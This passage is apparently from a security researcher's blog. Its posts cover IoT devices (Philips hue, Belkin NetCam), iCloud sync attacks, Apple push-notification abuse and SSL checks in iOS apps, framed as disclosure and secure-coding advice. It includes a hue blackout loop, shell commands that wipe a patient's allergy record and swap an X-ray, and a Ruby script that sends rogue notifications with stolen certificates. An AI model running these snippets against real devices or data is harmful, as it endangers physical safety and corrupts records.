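Note that nothing in this exchange identifies or authenticates the caller, which is precisely the design issue.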

The Belkin NetCam uses SSL and requires the user to log in even on the local Wi-Fi. However, as shown in Figure 5, it sends the credentials in the clear to a remote server. This enables local malware, or any server in the path via the ISP, to capture the credentials and spy on the camera owners.

Given the upcoming revolution of automation in our homes, we are already seeing self-installable IoT devices such as the candidates discussed. As the above examples illustrate in detail, we cannot secure our future by asserting that IoT devices and supporting applications have no responsibility for protecting the user’s privacy and security beyond requiring the user to set up a strong Wi-Fi password.

IoT device manufacturers should lay the foundation for a strong security architecture that is usable and not easily susceptible to other devices on the network. In these times, a compromised device on a home network can lead to the loss of financial and personal information. If IoT vendors continue their approach of depending on the local home network and every other device on it being completely secure, we will live in a world where a single compromised device can result in gross remote violations of the privacy and physical security of its customers.

August 13, 2013

The phenomenon of the Internet of Things (IoT) is positively influencing our lives by augmenting our spaces with intelligent and connected devices. Examples of these devices include lightbulbs, motion sensors, door locks, video cameras, thermostats, and power outlets. By 2022, the average household with two teenage children will own roughly 50 such Internet connected devices, according to estimates by the Organization for Economic Co-Operation and Development. Our society is starting to increasingly depend upon IoT devices to promote automation and increase our well being. As such, it is important that we begin a dialogue on how we can securely enable the upcoming technology.

I am excited to release my security research on the Philips hue lighting system. The hue personal wireless system is available for purchase from the Apple Store and other outlets. Out of the box, the system comprises wireless LED light bulbs and a wireless bridge. The light bulbs can be configured to display any of 16 million colors.

I'd like to highlight a particular vulnerability that can be used by malware on an infected machine on the user's internal network to cause a sustained blackout. A video demonstration of this vulnerability can be seen in the video above. For details, please read the PDF. The sample malware script (hue_blackout.bash) can be found in Appendix A.
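To make the mechanics concrete: the hue bridge exposes a local REST interface in which a PUT of {"on": false} to /api/&lt;token&gt;/lights/&lt;id&gt;/state switches a bulb off, and a sustained blackout simply repeats this for every bulb. The sketch below is a Python illustration of that loop, not the hue_blackout.bash script from the appendix; the bridge IP and token are placeholders.

```python
import json
import urllib.request

def light_off_request(bridge_ip, token, light_id):
    """Build the PUT request that switches one bulb off."""
    url = f"http://{bridge_ip}/api/{token}/lights/{light_id}/state"
    body = json.dumps({"on": False}).encode()
    req = urllib.request.Request(url, data=body, method="PUT")
    req.add_header("Content-Type", "application/json")
    return req

def blackout_pass(bridge_ip, token, light_ids):
    """One pass of the blackout loop; sustained malware repeats this forever."""
    for lid in light_ids:
        urllib.request.urlopen(light_off_request(bridge_ip, token, lid))
```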

Here were the goals of the research:

- Lighting is critical to physical security. Smart lightbulb systems are likely to be deployed in current and new residential and corporate constructions. An abuse case such as the ability of an intruder to remotely shut off lighting in locations such as hospitals and other public venues can result in serious consequences.

- The system is easily available in the marketplace and is one of the more popular self installable wireless light bulb solutions.

- The architecture employs a mix of network protocols and application interfaces that are interesting to evaluate from a design perspective. It is likely that competing products will deploy similar interfaces, thereby inheriting the same abuse cases.

The hue system is a wonderfully innovative product. It is therefore important to understand how it works and to ultimately push forward the secure enablement of similar IoT products.

January 29, 2013

The “protect the data, not the (mobile) device” mantra is permeating across organizations today, and that is a good thing. In this article, I wish to support the thought process by lending evidence for the following hypothesis: cloud synchronization services are likely to become a popular attack target by way of the desktop which is currently the weakest link.

In other words (and using Apple’s ecosystem as an example):

Individuals in the work place that use an iOS device (iPhone or iPad) also own a desktop (or laptop).

The desktop operating system (OSX or Windows) is still the choice avenue of attack.

Most users use iCloud to sync data between applications on their various devices. Note that iCloud files sync across devices regardless of whether a corresponding app is installed on a particular device.

Malware or a rootkit that infects the desktop can steal and influence data that is synced using iCloud (as illustrated in the rest of this article).

Figure 1: Core iCloud services provided by Apple

The iCloud service offers two distinct services. As shown in Figure 1, the set of core services allows the user to backup and restore their device, as well as sync (i)Messages, contacts, calendars, reminders, Safari bookmarks & open tabs, notes, Passbook information, photos, and use the Find My iPhone feature.

These services can be turned on individually or managed via an MDM (Mobile Device Management) solution. Should these services be utilized, the “keys to the kingdom” in being able to access the user’s device data fully relies upon the strength and secrecy of the user’s iCloud password. In my blog post titled Apple’s iCloud: Thoughts on Security and the Storage APIs [PDF], I also discuss this risk in addition to a possibility of automated tools that scrape credentials of users compromised from other attacks (and published in forums and avenues such as @PasteinLeaks) to capture users’ iOS device data en masse.

Figure 2: iCloud Storage APIs (turned off in this case)

The second service offered as part of iCloud is the set of Storage APIs that 3rd party developers can use to have the user’s sessions and application data seamlessly sync across devices and operating systems. This feature is the focus of this write-up.

Figure 3: iCloud directory in the GoodReader app on the iPhone

Figure 4: iCloud directory in the GoodReader app on the iPad

For example, the GoodReader app can be configured to use iCloud to manage documents across devices (iPhone in Figure 3 and the iPad in Figure 4).

For the purposes of the attack vector, assume that the user’s Macbook Air has been compromised. Traditionally, the attacker would be limited to the data stored on the OSX file-system. If the attacker wanted to gain access to data on other devices, the best bet would be to look for backup files. However, many users these days do not routinely back up their iOS devices with their laptops and use iCloud instead. In this situation, the attacker can directly browse to the user’s ~/Library/Mobile Documents/ directory to access application data stored by apps that utilize the iCloud Storage APIs. What’s more, any changes the attacker makes to files in this directory are synced back to the iOS devices.

At this point, the attacker can steal the Fiscal_Q1.pdf, delete it, or alter it. These changes will be reflected on the user’s iOS device within seconds. Imagine the implications for a victim whose profession is in the financial, medical, or military fields.
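From the attacker’s perspective, enumerating this data is nothing more than a directory walk over the path named above. A minimal sketch (the container naming convention shown in later figures, [TeamID]~reverse~domain, is how OSX lays out the directory):

```python
import os

ICLOUD_ROOT = os.path.expanduser("~/Library/Mobile Documents")

def list_icloud_documents(root=ICLOUD_ROOT):
    """Return every file synced into the local iCloud containers."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            found.append(os.path.join(dirpath, name))
    return found
```

No privilege escalation or keychain access is needed; the files sit in the user’s home directory.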

Based on this possibility, here are some points to take away:

The desktop OS is quite likely still the weakest link and can give rise to Cross Device Attacks such as these. Future malware and rootkits are likely to exploit this. In the case of iOS devices with Document sync turned on, attackers and rootkit authors are likely to take advantage of situations where one of the devices can be easily compromised. They are likely to target popular iCloud apps to steal data as well as to modify and influence business transactions to their advantage.

Developers need to be cognizant of data flow within their apps. Not all types of data, particularly credentials, need to be synced across devices. Note that app data may also sync by way of Apple’s core backup & restore service; developers can mark files that shouldn’t be synced by invoking addSkipBackupAttributeToItemAtURL or storing the files in Library/Caches within the iOS bundle.

Enterprises must prepare to enable sync services. At the moment, the easy solution may be to configure employee devices via MDM to disable iCloud backup and documents. However, customers and employees will demand sync services such as these, as they provide seamless transitions across devices and increased productivity. Perhaps the convergence of desktop and mobile operating systems and devices may pave the way in the right direction; it can be argued that the Sandbox mechanism in OSX, which draws inspiration from the iOS sandbox architecture, is one example of this.

In summary, cloud sync technologies have blurred the lines surrounding data compartmentalization. Organizations seriously looking into creating solid mobile security strategies must accept this reality: the entire ecosystem of devices, including attack vectors across devices, should be taken into account and incorporated into the strategy.

December 05, 2011

At the 2011 World Wide Developer Conference in San Francisco, Steve Jobs revealed his vision for Apple’s iCloud: to demote the desktop as the central media hub and to seamlessly integrate the user’s experience across devices.

Apple’s iCloud service comprises two distinct features. The first provides the user with the ability to back up and restore the device over the air without having to sync with an OSX or Windows computer. This mechanism is completely controlled by Apple and also provides free email and photo syncing capabilities. The second allows 3rd party developers to leverage data storage capabilities within their own apps.

In this article, I will provide my initial thoughts on iCloud from a security perspective. The emphasis of this article is to discuss the iCloud storage APIs from a secure coding and implementation angle, but I will start by addressing some thoughts on the backup and restore components.

Business Implications of Device Backup and Restore Functionality

Starting with iOS5, iPhone and iPad users do not have to sync their devices with a computer. Using a wireless connection, they can activate their devices as well as backup and restore their data by setting up an iCloud account.

Following are some thoughts on risks and opportunities that may arise for businesses as their employees begin to use iOS devices that are iCloud enabled.

High potential for mass data compromise using automated tools.

An iOS device that is iCloud enabled continuously syncs data to Apple’s data-centers (and to cloud services Apple has in turn leased from Amazon (EC2) and Microsoft (Azure)). The device also performs a backup about once a day when the device is plugged into a power outlet and when WiFi is available (this can also be manually initiated by the user).

It is easy to intercept the traffic between an iOS device and the iCloud infrastructure using an HTTP proxy tool such as Burp. Interestingly, the backupd process also backs up data to the Amazon infrastructure:

In this case, the device had previously authenticated to Apple domains (*.icloud.com and *.apple.com). Most likely, those servers initiated a back-end session with Amazon tied to the user’s session based on the filename provided to the PUT request above.

The biggest point here from a security perspective is that all the information is protected by the user’s iCloud credentials, which are present in the Authorization: X-MobileMe-AuthToken header using basic access authentication (base64).
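In other words, no key material is involved in the header itself: basic access authentication is plain base64, so anyone who captures or guesses the credential pair can reconstruct the token, and anyone who captures the token can recover the credentials. A small illustration (the credential values are made up; only the header name comes from the capture above):

```python
import base64

def build_auth_header(username, password):
    """Assemble the header value the way basic access authentication does."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"X-MobileMe-AuthToken {token}"

def recover_credentials(header):
    """Reverse the encoding -- base64 is not encryption."""
    token = header.split(" ", 1)[1]
    return base64.b64decode(token).decode().split(":", 1)
```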

iCloud backs up emails, calendars, SMS and iMessages, browser history, notes, application data, phone logs, etc. This information can be a gold mine for adversaries. It is my hypothesis that in the near future we are going to see automated tools that will do the following:

The risk to organizations and government institutions is enormous. A malicious entity can automatically download the majority of the data associated with an individual’s iPhone or iPad simply by gaining access to their iCloud password (which could have been compromised due to password reuse at another service).

Also, Mobile Device Management (MDM) vendors are likely to integrate iCloud-related policy settings, and this should be leveraged.

3rd party apps, as well as iOS apps developed in-house, should be assessed for security vulnerabilities against the iCloud API related principles listed in the next section.

iCloud Storage APIs

A significant aspect of the iCloud platform is the availability of the iCloud storage APIs [http://developer.apple.com/icloud/index.php] to developers. These APIs allow developers to write applications that leverage the iCloud to wirelessly push and synchronize data across user devices.

iCloud requires iOS5 and Mac OSX Lion. These operating systems have been recently released and developers are busy modifying their applications to integrate the iCloud APIs. In the coming months, we are bound to see an impressive increase in the number of apps that leverage iCloud.

In this section, I will discuss my initial thoughts on how to securely enable iOS apps using the iCloud Storage APIs. I will step through how to write a simple iOS app that leverages iCloud Storage APIs. This app will create a simple document in the user’s iCloud container and auto update the document when it changes. During this walk-through, I will point out secure development tips and potential abuse cases to watch out for.

Creating and Configuring an App ID and Provisioning Profile for iCloud Services

This is the first step required to allow your test app to use the iCloud services. The App ID is really a common-name description of the app to use during the development process.

Figure 1: Creating an App ID using the Developer provisioning portal.

The provisioning portal also requires you to pick a “Bundle Identifier” in reverse-domain style. This has to be a unique string. For example, an attempt to create an App ID with the Bundle Identifier of com.facebook.facebook is promptly rejected because it is most likely in use by the official Facebook app.

The next step is to enable your App ID for iCloud services. Click on “Configure” in your App ID list under the “Action” column. Next, check “Enable for iCloud”.

Figure 2: Enabling your App ID for iCloud

Select the “Provisioning” tab and click on “New Profile”. Pick the App ID you created earlier and select the devices you want to test the app on. Note that the simulator cannot access the iCloud API so you will need to deploy the app onto an actual device.

Once you have the App ID configured, you have to create a provisioning profile. A provisioning profile is a property-list (.plist) file signed by Apple. This file contains your developer certificate. Code that is compiled with this developer certificate is allowed to execute on the devices selected in the profile.

Figure 3: Provisioning profile loaded in XCode

Download the profile and open it (double-click and XCode should pick it up as shown in Figure 3).

Writing a Simple iCloud App in XCode

In Xcode, create a new project. Choose “Single View Application” as the template. Enter “dox” for the product name and the company identifier you used when creating the App ID. The Device family should be “Universal”. The “Use Automatic Reference Counting” option should be checked and the other options should be unchecked.

Figure 4: Creating a sample iCloud project in XCode

Next, select your project in the “Project Navigator” and select the “dox” target. Click on “Summary” and go to the “Entitlements” section.

Figure 5: Project entitlements (iCloud)

The defaults should look like the screen-shot in Figure 5 and you don’t have to change anything.

Open up AppDelegate.m and add the following code at the bottom of application:didFinishLaunchingWithOptions (before the return YES;):

NSURL *ubiq = [[NSFileManager defaultManager]
                  URLForUbiquityContainerIdentifier:nil];
if (ubiq) {
    NSLog(@"iCloud access at %@", ubiq);
    // TODO: Load document...
} else {
    NSLog(@"No iCloud access");
}

Figure 6: “Documents & Data” in iCloud settings turned off

Now assume that the test device has the “Documents & Data” preference in iCloud set to “off”. In this case, if you run the project now, you should see the log notice shown in Figure 7.

Figure 7: App unable to get an iCloud container instance

If the “Documents & Data” setting is turned “On”, you should see a log notice similar to Figure 8.

Figure 8: iCloud directory on the local device

Notice that the URL returned is a ‘local’ (i.e. file://) container. This is because the iCloud daemon running on the iOS device (and on OSX) automatically synchronizes information users put into this directory between all of the user’s iCloud devices. If the user also has OSX Lion, files created on iOS will appear in their ~/Library/Mobile Documents/ directory.

Once you are done, you can deploy your app onto two separate iOS devices and watch the text sync using iCloud. The embedded video above demonstrates the app in action.

Security Considerations

The following is a list of security considerations that may be useful in managing risk pertaining to the iCloud storage APIs.

Guard the credentials to your Apple developer accounts. It is important to safeguard your Apple developer account credentials and make sure they are complex enough to resist brute forcing. Someone with access to your developer account could release an app with the same Bundle Seed ID (discussed below) that accesses users’ iCloud containers and ferries the information to the attacker.

The Bundle Seed ID is used to constrain the local iCloud directory. As you can see in Figure 8, the local directory is in the form [Bundle Seed/Team ID].[iCloud container specified in entitlements]. The app can have multiple containers (i.e. multiple directories) if specified in the entitlements, but only in the form [Bundle Seed ID].*, as constrained in the provisioning profile:

...
<key>Entitlements</key>
<dict>
    <key>application-identifier</key>
    <string>46Q6HN4L88.com.icloudtest.dox</string>
    <key>com.apple.developer.ubiquity-container-identifiers</key>
    <array>
        <string>46Q6HN4L88.*</string>
    </array>
    <key>com.apple.developer.ubiquity-kvstore-identifier</key>
    <string>46Q6HN4L88.*</string>
</dict>
...
<key>TeamIdentifier</key>
<array>
    <string>46Q6HN4L88</string>
</array>
...

Figure 9: Entitlements settings visible in XCode

If you try to change the values of com.apple.developer.ubiquity-container-identifiers or com.apple.developer.ubiquity-kvstore-identifier (in your entitlements settings visible in Xcode) to begin with anything other than what you have in your provisioning profile, XCode will complain as shown in Figure 10.

Figure 10: Xcode error about invalid entitlements

It is clear that Apple uses the Bundle Seed ID (Team ID) to constrain access to user data in iCloud between different organizations. As discussed earlier, if someone were to get Apple’s provisioning portal to issue a provisioning profile with someone else’s Team ID, they could write apps that (at least locally) have access to the user’s iCloud data, since their local iCloud file:// mapping will coincide.
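The constraint the provisioning profile enforces can be stated compactly: every ubiquity container identifier must fall under the Team ID namespace, i.e. match the prefix &lt;TeamID&gt;. as in the entitlements above. The check below is an illustrative restatement of that rule, not Apple’s actual validation code:

```python
def container_allowed(identifier, team_id):
    """True if the entitlement identifier falls within the team's namespace."""
    return identifier.startswith(team_id + ".")
```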

Do not store critical information in iCloud containers, including session data. iCloud data is stored locally and synced to the iCloud infrastructure. Users often have multiple devices (iPhone, iPod Touch, iPad, Macbook, iMac), so their iCloud data will be automatically synced across devices. If a malicious entity were to temporarily gain access to the filesystem (by having physical access or by implanting malware), he or she could gain access to the local iCloud containers (/private/var/mobile/Library/Mobile Documents/ in iOS and ~/Library/Mobile Documents/ in OSX). It is therefore a good idea not to store critical information such as session tokens, passwords, or personally identifiable financial or healthcare data.

Do not trust data in your iCloud to commit critical transactions. As discussed in the prior paragraph, an attacker with temporary access to a user’s file system can access iCloud documents stored locally. Note that the attacker can also edit or add files into the iCloud containers and the changes will be synced across devices.

Assume a hospital were to deploy an iCloud-enabled medical app to be used by doctors, such as the screenshot in Figure 11. If an attacker were to gain access to the doctor’s Macbook Air running OSX, for example, they could look at the local filesystem:

$ cd ~/Library/"Mobile Documents"/46Q6HN4L88~com~hospital~app/Documents
$ ls
Allergies.txt    1.TIFF
$ cat /dev/null > Allergies.txt
$ cp ~/Downloads/1.TIFF 1.TIFF

Once the attacker has issued the commands above, the doctor’s iCloud container will be updated with the modified information across all devices. In this example, the attacker has altered a particular patient’s record to remove listed allergies and replace the X-Ray image.

Place user-visible files in the Documents subdirectory of your iCloud container. Other files will be treated as data and can only be deleted all at once. Exposing documents individually also allows users to notice and notify you if a bug in your application is causing too much data to be written into iCloud, which can exhaust users' storage quotas and thus create a denial of service condition.

Take care to handle conflicts appropriately. Documents that are edited on multiple devices are likely to cause conflicts. Depending upon the logic of your application code, it is important to make sure you handle these conflicts so that the integrity of the user’s data is preserved.

Understand that Apple has the capability to see your users' iCloud data. Data is encrypted in transit from the local device to the iCloud infrastructure. However, note that Apple retains the capability to look at your users' data. There is a low probability that Apple would choose to do this, but depending upon your business, there may be regulatory and legal issues that prohibit storage of certain data in iCloud.

iOS sandboxing vulnerabilities may be exploited by rogue apps. Try putting the string @"../../Documents" into URLByAppendingPathComponent, or editing your container identifier in your entitlements to contain ".." or other special characters. You will note that iOS will either trap your attempt at runtime or replace special characters that could cause an app to break out of the local iCloud directory. If someone were to find a vulnerability in iOS sandboxing or file parsing mechanisms, it is possible they could leverage it to build a rogue app that accesses another app’s iCloud data.
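The runtime trap described above amounts to refusing any path component that would resolve outside the container. A defensive equivalent (illustrative only; not iOS’s implementation) normalizes the joined path and verifies it still sits under the container root:

```python
import os

def safe_container_path(container_root, component):
    """Return the joined path, or None if the component escapes the container."""
    candidate = os.path.normpath(os.path.join(container_root, component))
    root = os.path.normpath(container_root)
    if not candidate.startswith(root + os.sep):
        return None
    return candidate
```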

These security principles also apply to key-value data storage. The iCloud Storage APIs also allow the storage of key-value data in addition to documents. The security tips outlined in this article also apply to key-value storage APIs.

Watch out for iCloud backups. As presented in the earlier section, the user can choose to back up his or her phone data to iCloud. This includes the Documents/ portion within the app sandbox (note: this is not the Documents folder created as part of the iCloud container, but is part of the application bundle). If there is critical information you do not wish to preserve, move it to Library/Caches. You may also wish to leverage the addSkipBackupAttributeToItemAtURL method to identify specific directories that should not be backed up.

I hope this article contained information to help you and your organization think through security issues and principles surrounding iCloud. The ultimate goal is to enable technology, but in a way that is cognizant of the associated risks. Feel free to get in touch if you have any comments, questions, or suggestions.

This whitepaper brings together emerging research to illustrate the net-new attack vectors targeting iOS applications. The intended audience for the rest of this paper include technical security analysts and iOS application developers. The following topics are discussed in detail:

In addition to these topics, the Appendix in the whitepaper contains a checklist of items to consider when assessing iOS applications. This list includes traditional application security weaknesses that also apply to iOS. Additional items to consider, such as data protection and file encryption applicable to iOS devices, are also presented in the Appendix.

I trust many may find the information in the paper valuable and actionable. If you have any questions or feedback, please feel free to contact me.

February 07, 2011

Millions of iOS users and developers have come to rely on Apple’s Push Notification Service (APN). In this article, I will briefly introduce details of how APN works and present scenarios of how insecure implementations can be abused by malicious parties.

Apple’s iOS allows some tasks to truly execute in the background when a user switches to another app (or goes back to the home screen), yet most apps will return and resume from a frozen state right where they left off. Apple’s implementation helps preserve battery life by providing the user the illusion that iOS allows for full-fledged multi-tasking between 3rd party apps.

This setup makes it hard for apps to implement features that rely on full-fledged multi-tasking. For example, an Instant Messaging app will want to alert the user of a new incoming message even if the user is using another app. To enable this functionality, the APN service can be used by app vendors to push notifications to the user’s device even when the app is in a frozen state (i.e. the user is using another app or is on the home screen).

Figure 1: Badge and alert notification in iOS

There are 3 types of push notifications in iOS: alerts, badges, and sounds. Figure 1 shows a screen-shot illustrating both an alert and a badge notification.

iOS devices maintain a persistent connection to the APN servers. Providers, i.e. 3rd party app vendors, must connect to the APN to route the notification to a target device.

So how can an app developer implement push notifications? For explicit details, I’d recommend going through Apple’s excellent Local and Push Notifications Programming Guide. However, I will briefly cover the steps below with emphasis on steps that have interesting security implications and tie them to abuse cases and recommendations.

1. Create an App ID on Apple’s iOS Provisioning Portal. This step requires you sign up for a developer account ($99). This is straight-forward: just click on App IDs in the provisioning portal and then select New App ID. Next, enter text in the Description field that describes your app. The Bundle Seed ID is used to signify if you want multiple apps to share the same Keychain store.

The Bundle Identifier is where it gets interesting: you need to enter a unique identifier for your App ID. Apple recommends using a reverse-domain name style string for this.

The Bundle Identifier is significant from a security perspective because it makes its way into the provider certificate we will create later (also referred to as the topic). The APN trusts this field in the certificate to figure out which app in the target user’s device to convey the push message to. As Figure 2 illustrates, an attempt to create an App ID with the Bundle Identifier of com.facebook.facebook is promptly refused as a duplicate, i.e. the popular Facebook iOS app is probably using this in its certificate. Therefore, if a malicious entity were to bypass the provisioning portal’s restrictions against allowing an existing Bundle Identifier, he or she could possibly influence Apple to provision a certificate that can be abused to send push notifications to users of another app (though the malicious user would still need to know the target user’s device-token, discussed later in this article).

2. Create a Certificate Signing Request (CSR) to have Apple generate an APN certificate. In this step, Keychain on the desktop is used to generate a public and private cryptographic key pair. The private key stays on the desktop. The public key is included in the CSR and uploaded to Apple. The APN certificate that Apple provides back is specific to the app and tied to a specific App ID generated in step 1.

3. Create a Provisioning Profile to deploy your App onto a test iOS device with push notifications enabled for the App ID you selected. This step is straightforward and described in Apple’s documentation linked above.

4. Export the APN certificate to the server side. As described in Apple’s documentation, you can choose to export the certificate to .pem format. This certificate can then be used on the server side of your app infrastructure to connect to the APN and send push notifications to targeted devices.

5. Code iOS application to register for and respond to notifications. Your iOS app must register with the device (which in turn registers with the APN) to receive notifications. The best place to do this is in applicationDidFinishLaunching:, for example:

Notice that the delegate is passed the deviceToken. This token is NOT the same as the UDID, which is an identifier specific to the hardware. The deviceToken is specific to the instance of the iOS installation, i.e. it will migrate to a new device if the user were to restore a backup in iTunes onto a new device. The interesting thing to note here is that the deviceToken is static across apps on the specific iOS instance, i.e. the same deviceToken will be returned to other apps that register to send push notifications.

The sendProviderDeviceToken: method sends the deviceToken to the provider (i.e. your server side implementation) so the provider can use it to tell the APN which device to send the targeted push notification to.

In the case where your application is not running and the iOS device receives a remote push notification from the APN destined for your app, the didFinishLaunchingWithOptions: delegate is invoked and the message payload is passed. In this case, you would handle and process the notification in this method. If your app is already running, then the didReceiveRemoteNotification: method is called (you can check the applicationState property to figure out if the application is active or in the background and handle the event accordingly).

6. Implement provider communication with the APN. With the provider keys obtained in step 4, you can implement server side code to send a push notification to your users.

As illustrated in Figure 3, you will need the deviceToken of the specific user you want to send the notification to (this is the token you would have captured from the device invoking your implementation of the sendProviderDeviceToken method described in Step 5). The Identifier is an arbitrary value that identifies the notification (you can use this to correlate an error response; see Apple’s documentation for details). The actual payload is in JSON format.
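For illustration, the frame the provider writes to the socket can be assembled by hand. The sketch below (Python purely for illustration; the function name is my own) assumes the legacy "simple notification" binary layout of the era — a command byte of 0, the token length and token, then the payload length and JSON payload:

```python
import json
import struct

def build_simple_notification(device_token_hex, payload):
    """Pack the legacy 'simple' APN frame: a command byte of 0, the
    2-byte big-endian token length, the 32-byte deviceToken, the
    2-byte payload length, and the JSON payload itself."""
    token = bytes.fromhex(device_token_hex)
    body = json.dumps(payload, separators=(",", ":")).encode("utf-8")
    if len(body) > 256:  # the APN rejects oversized payloads
        raise ValueError("payload too large for the APN")
    return (struct.pack("!BH", 0, len(token)) + token
            + struct.pack("!H", len(body)) + body)

frame = build_simple_notification("ab" * 32,
                                  {"aps": {"alert": "Hello", "badge": 1}})
```

The resulting bytes would then be written over the TLS connection to gateway.push.apple.com:2195 established with the provider certificate from step 4.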

Now that we have established details on implementing push notifications into custom apps, let’s discuss applicable security best practices along with abuse cases.

1. Do not send company confidential data or intellectual property in the message payload. Even though end points in the APN architecture are TLS encrypted, Apple is able to see your data in clear-text. There may be legal ramifications of disclosing certain types of information to third-parties such as Apple. And I bet Apple would appreciate it too (they wouldn’t want the liability).

2. Push delivery is not guaranteed so don’t depend on it for critical notifications. Apple clearly states that the APN service is best-effort delivery.

Figure 4: Do not rely on push for critical notifications

As shown in Figure 4, the push architecture should not be relied upon for critical notifications. In addition, iPhones that are not connected to cellular data (or when the phone has low to no signal) MAY not receive push notifications when the display is off for a specific period since wifi is often automatically turned off to preserve battery.

3. Do not allow the push notification handler to modify user data. The application should not delete data as a result of the application launching in response to a new notification. An example of why this is important is the situation where a push notification arrives while the device is locked: the application is immediately invoked to handle the pushed payload as soon as the user unlocks the device. In this case, the user of your app may not have intended to perform any transaction that results in the modification of his or her data.

4. Validate outgoing connections to the APN. The root Certificate Authority for Apple’s certificate is Entrust. Make sure you have Entrust’s root CA certificate so you are able to verify your outgoing connections (i.e. from your server side architecture) are to the legitimate APN servers and not a rogue entity.
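As a rough sketch of that validation on the provider side (Python here purely for illustration; the CA bundle path is hypothetical), the essential points are to require certificate verification and hostname checking rather than silently accepting any certificate:

```python
import socket
import ssl

def make_verified_context(ca_bundle=None):
    """Build a TLS context that refuses the connection unless the server
    presents a certificate chaining to a trusted root and matching the
    requested hostname."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)  # CERT_REQUIRED + hostname check
    if ca_bundle:
        ctx.load_verify_locations(ca_bundle)  # e.g. a local copy of the root CA
    else:
        ctx.load_default_certs()  # fall back to the system trust store
    return ctx

def connect_to_apn(ctx, host="gateway.push.apple.com", port=2195):
    """Raises an SSL verification error if a rogue endpoint answers."""
    raw = socket.create_connection((host, port))
    return ctx.wrap_socket(raw, server_hostname=host)
```

The point of the sketch is the default posture: verification and hostname matching are required, and a man-in-the-middle presenting any other certificate causes the handshake to fail.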

5. Be careful with unmanaged code. Be careful with memory management and perform strict bounds checking if you are constructing the provider payload outbound to the APN using memory handling API in unmanaged programming languages (example: memcpy).

6. Do not store your SSL certificate and list of deviceTokens in your web-root. I have come across instances where organizations have inadvertently exposed their Apple signed APN certificate, associated private key, and deviceTokens in their web-root.

Figure 5: Screen-shot of APN certificates and deviceTokens being exposed

The illustration in Figure 5 is a real screen-shot of an iOS application vendor inadvertently exposing their APN certificates as well as a PHP script which lists all deviceTokens of their customers.

Figure 6: Scenario depicting rogue push notifications targeting the Facebook and CNN apps once their provider certificates have been compromised

In this abuse case, any malicious entity who is able to get at the certificates and list of deviceTokens will be able to send arbitrary push notifications to this iOS application vendor’s customers (see Figure 6). For example, the jpoz-apns Ruby gem can be used to send out concurrent rogue notifications:

APNS.host = 'gateway.push.apple.com'
APNS.pem = '/path/to/pwn3d/pem/file'
APNS.pass = ''
APNS.port = 2195

stolen_dtokens.each do |dtoken|
  APNS.send_notification(dtoken, 'pwn3d')
end

I would also highly recommend protecting your cert with a passphrase (it is assumed to be null in the above example). And it goes without saying that you should also keep any sample server side code that has the passphrase embedded in it out of your web-root. In fact, there is no good reason why any of this information should even reside on a host that is accessible from the Internet (incoming) since the provider connections to the APN need to be outbound only.

I feel Apple has done a good job of thinking through security controls to apply in the APN architecture. I hope the suggestions in this article help you to think through how to make sure the APN implementation in your app and architecture is secure from potential abuses.

December 31, 2010

Many iOS applications use HTTP to connect to server side resources. To protect user-data from being eavesdropped, iOS applications often use SSL to encrypt their HTTP connections.

In this article, I will present sample Objective-C code to illustrate how HTTP(S) connections are established and how to locate insecure code that can leave the iOS application vulnerable to Man in the Middle attacks. I will also discuss how to configure an iOS device to allow for interception of traffic through an HTTP proxy for testing purposes.

A Simple App Using NSURLConnection

The easiest way to initiate HTTP requests in iOS is to utilize the NSURLConnection class. Here is sample code from a very simple application that takes in a URL from an edit-box, makes a GET request, and displays the HTML obtained.

The result is a simple iOS application that fetches HTML code from a given URL.

Figure: Simple iOS App using NSURLConnection to fetch HTML from a given URL.

In the screen-shot above, notice that the target URL is https. NSURLConnection seamlessly establishes an SSL connection and fetches the data. If you are reviewing source code of an iOS application for your organization to locate security issues, it makes sense to analyze code that uses NSURLConnection. Make sure you understand how the connections are being initiated, how user input is utilized to construct the connection requests, and whether SSL is being used or not. While you are at it, you may also want to watch for NSURL* usage in general, including invocations of objects of type NSHTTPCookie, NSHTTPCookieStorage, NSHTTPURLResponse, NSURLCredential, NSURLDownload, etc.

Man in the Middle

74.125.224.49 is one of the IP addresses bound to the host name www.google.com. If you browse to https://74.125.224.49, your browser should show you a warning due to the fact that the Common Name field in the SSL certificate presented by the server (www.google.com) does not match the host+domain component of the URL.

Figure: Safari on iOS warning the user due to mis-match of the Common Name field in the certificate.

As presented in the screen-shot above, Safari on iOS does the right thing by warning the user in this situation. Common Name mis-matches and certificates that are not signed by a recognized certificate authority can be signs of a Man in the Middle attempt by a malicious party that is on the same network segment as that of the user or within the network route to the destination.

Figure: NSURLConnection's connection:didFailWithError: delegate is invoked to throw a similar warning.

The screenshot above shows what happens if we attempt to browse to https://74.125.224.49 using our sample App discussed earlier: the connection:didFailWithError: delegate is called indicating an error, which in this case warns the user of the risk and terminates.

This is fantastic. Kudos to Apple for thinking through the security implications and presenting a useful warning message to the user (via NSError).

Unfortunately, it is quite common for application developers to over-ride this protection for various reasons: for example, if the test environment does not have a valid certificate and the code makes it to production. The code below is enough to over-ride this protection outright:

The details on this code are available from this stackoverflow post. There is also a private method for NSURLRequest called setAllowsAnyHTTPSCertificate:forHost: that can be used to over-ride the SSL warnings, but Apps that use it are unlikely to get through the App store approval process (Apple prohibits invocations of private API).

If you are responsible for reviewing your organization's iOS code for security vulnerabilities, I highly recommend you watch for such dangerous design decisions that can put your client's data and your company's data at risk.
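One way to operationalize such a review is a simple static scan for the APIs named above. The sketch below (Python; the pattern list is deliberately minimal and should be extended for your codebase) flags lines worth a manual look:

```python
import re
from pathlib import Path

# APIs worth flagging for manual review, per the discussion above:
# NSURLConnection usage and the private SSL-override method.
RISKY_PATTERNS = {
    "NSURLConnection": re.compile(r"\bNSURLConnection\b"),
    "setAllowsAnyHTTPSCertificate": re.compile(r"setAllowsAnyHTTPSCertificate"),
}

def flag_risky_lines(source_root):
    """Walk .m and .h files under source_root and return
    (file, line_number, pattern_name) tuples for each match."""
    hits = []
    for path in Path(source_root).rglob("*.[mh]"):
        text = path.read_text(errors="ignore")
        for lineno, line in enumerate(text.splitlines(), start=1):
            for name, pattern in RISKY_PATTERNS.items():
                if pattern.search(line):
                    hits.append((str(path), lineno, name))
    return hits
```

A hit is not a vulnerability by itself; the scan only narrows down where a human reviewer should look at how the connection and its trust decisions are implemented.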

Intercepting HTTPS traffic using an HTTP Proxy

